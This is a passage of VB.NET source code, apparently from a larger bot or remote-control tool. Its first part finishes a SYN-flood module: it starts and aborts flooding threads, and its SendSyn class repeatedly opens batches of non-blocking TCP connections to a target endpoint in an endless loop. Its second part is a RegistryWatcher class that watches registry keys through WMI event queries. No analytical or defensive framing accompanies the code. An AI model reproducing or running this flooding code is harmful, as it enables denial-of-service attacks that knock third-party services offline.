2238. FloodingThread(i) = New Thread(FloodingJob(i))
2239. FloodingThread(i).Start()
2240. Next
2241. End Sub
2242. Public Shared Sub StopSynFlood()
2243. For i As Integer = 0 To Threads - 1
2244. Try
2245. FloodingThread(i).Abort()
2246. Catch
2247. End Try
2248. Next
2249. IsRunning = False
2250. End Sub
2251. Private Class SendSyn
2252. Private ipEo As IPEndPoint
2253. Private Sock As Socket()
2254. Private SynSockets As Integer
2255. Public Sub New(ByVal ipEo As IPEndPoint, ByVal SynSockets As Integer)
2256. Me.ipEo = ipEo
2257. Me.SynSockets = SynSockets
2258. End Sub
2259. Public Sub OnConnect(ByVal ar As IAsyncResult)
2260.  
2261. End Sub
2262. Public Sub Send()
2263. Dim num As Integer
2264. Label_0000:
2265. Try
2266. Me.Sock = New Socket(Me.SynSockets - 1) {}
2267. For num = 0 To Me.SynSockets - 1
2268. Me.Sock(num) = New Socket(Me.ipEo.AddressFamily, SocketType.Stream, ProtocolType.Tcp)
2269. Me.Sock(num).Blocking = False
2270. Dim callback As New AsyncCallback(AddressOf Me.OnConnect)
2271. Me.Sock(num).BeginConnect(Me.ipEo, callback, Me.Sock(num))
2272. Next
2273. Thread.Sleep(100)
2274. For num = 0 To Me.SynSockets - 1
2275. If Me.Sock(num).Connected Then
2276. Me.Sock(num).Disconnect(False)
2277. End If
2278. Me.Sock(num).Close()
2279. Me.Sock(num) = Nothing
2280. Next
2281. Me.Sock = Nothing
2282. GoTo Label_0000
2283. Catch
2284. For num = 0 To Me.SynSockets - 1
2285. Try
2286. If Me.Sock(num).Connected Then
2287. Me.Sock(num).Disconnect(False)
2288. End If
2289. Me.Sock(num).Close()
2290. Me.Sock(num) = Nothing
2291. Catch
2292. End Try
2293. Next
2294. GoTo Label_0000
2295. End Try
2296. End Sub
2297. End Class
2298. End Class
2299. Public Class RegistryWatcher
2300. Public MonitorCollection As New Collections.Generic.Dictionary(Of String, Monitor)
2301. Public Event RegistryChanged(ByVal M As Monitor)
2302. Public Enum HKEY_ROOTS As Integer
2303. HKEY_CLASSES_ROOT = 0
2304. HKEY_CURRENT_USER = 1
2305. HKEY_LOCAL_MACHINE = 2
2306. HKEY_USERS = 3
2307. HKEY_CURRENT_CONFIG = 4
2308. End Enum
2309. Public Sub AddWatcher(ByVal Root As HKEY_ROOTS, ByVal Path As String, ByVal ID As String, Optional ByVal Value As String = "")
2310. If MonitorCollection.ContainsKey(ID) = False Then
2311. Dim RegMon As New Monitor(Root, Path, ID, Value)
2312. AddHandler RegMon.Changed, AddressOf OnRegistryChanged
2313. MonitorCollection.Add(ID, RegMon)
2314. End If
2315. End Sub
2316. Public Sub RemoveWatcher(ByVal ID As String)
2317. If MonitorCollection.ContainsKey(ID) = True Then
2318. MonitorCollection(ID).StopWatch()
2319. MonitorCollection.Remove(ID)
2320. End If
2321. End Sub
2322. Private Sub OnRegistryChanged(ByVal M As Monitor)
2323. RaiseEvent RegistryChanged(M)
2324. End Sub
2325. Public Class Monitor
2326. Private mRoot As HKEY_ROOTS
2327. Private mPath As String
2328. Private mID As String
2329. Private mValue As String
2330. Private mStop As Boolean
2331. Public ReadOnly Property Root() As HKEY_ROOTS
2332. Get
2333. Return mRoot
2334. End Get
2335. End Property
2336. Public ReadOnly Property Path() As String
2337. Get
2338. Return mPath
2339. End Get
2340. End Property
2341. Public ReadOnly Property ID() As String
2342. Get
2343. Return mID
2344. End Get
2345. End Property
2346. Public ReadOnly Property Value() As String
2347. Get
2348. Return mValue
2349. End Get
2350. End Property
2351. Public Event Changed(ByVal M As Monitor)
2352. Sub New(ByVal NewRoot As HKEY_ROOTS, ByVal NewPath As String, ByVal NewID As String, ByVal NewValue As String)
2353. mRoot = NewRoot
2354. mPath = NewPath
2355. mID = NewID
2356. mValue = NewValue
2357.  
2358. Dim T As New Threading.Thread(AddressOf Watcher)
2359. T.Start()
2360. End Sub
2361. Public Sub StopWatch()
2362. mStop = True
2363. End Sub
2364. Private Sub Watcher()
2365. Dim WMIObject As Object
2366. Dim WMIEvent As Object
2367. Dim WMICurrEvent As Object
2368.  
2369. mPath = Replace(mPath, "\", "\\")
2370.  
2371. WMIObject = GetObject("winmgmts:\\.\root\default")
2372.  
2373. If mValue = "" Then
2374. WMIEvent = WMIObject.ExecNotificationQuery( _
2375. "SELECT * FROM RegistryKeyChangeEvent WHERE Hive='" & _
2376. mRoot.ToString & "' AND " & "KeyPath='" & mPath & "'")
2377. Else
2378. WMIEvent = WMIObject.ExecNotificationQuery( _
2379. "SELECT * FROM RegistryValueChangeEvent WHERE Hive='" & _
2380. mRoot.ToString & "' AND " & "KeyPath='" & mPath & "' AND ValueName='" & mValue & "'")
2381. End If
2382.  
2383. Do
2384. Try
2385. If mStop = True Then
2386. mStop = False
2387. Exit Sub
2388. End If
2389. WMICurrEvent = WMIEvent.NextEvent(500)
2390. RaiseEvent Changed(Me)
2391. Catch ex As Exception
2392. End Try
2393. Loop
2394. End Sub
2395. End Class
2396. End Class
2397. End Namespace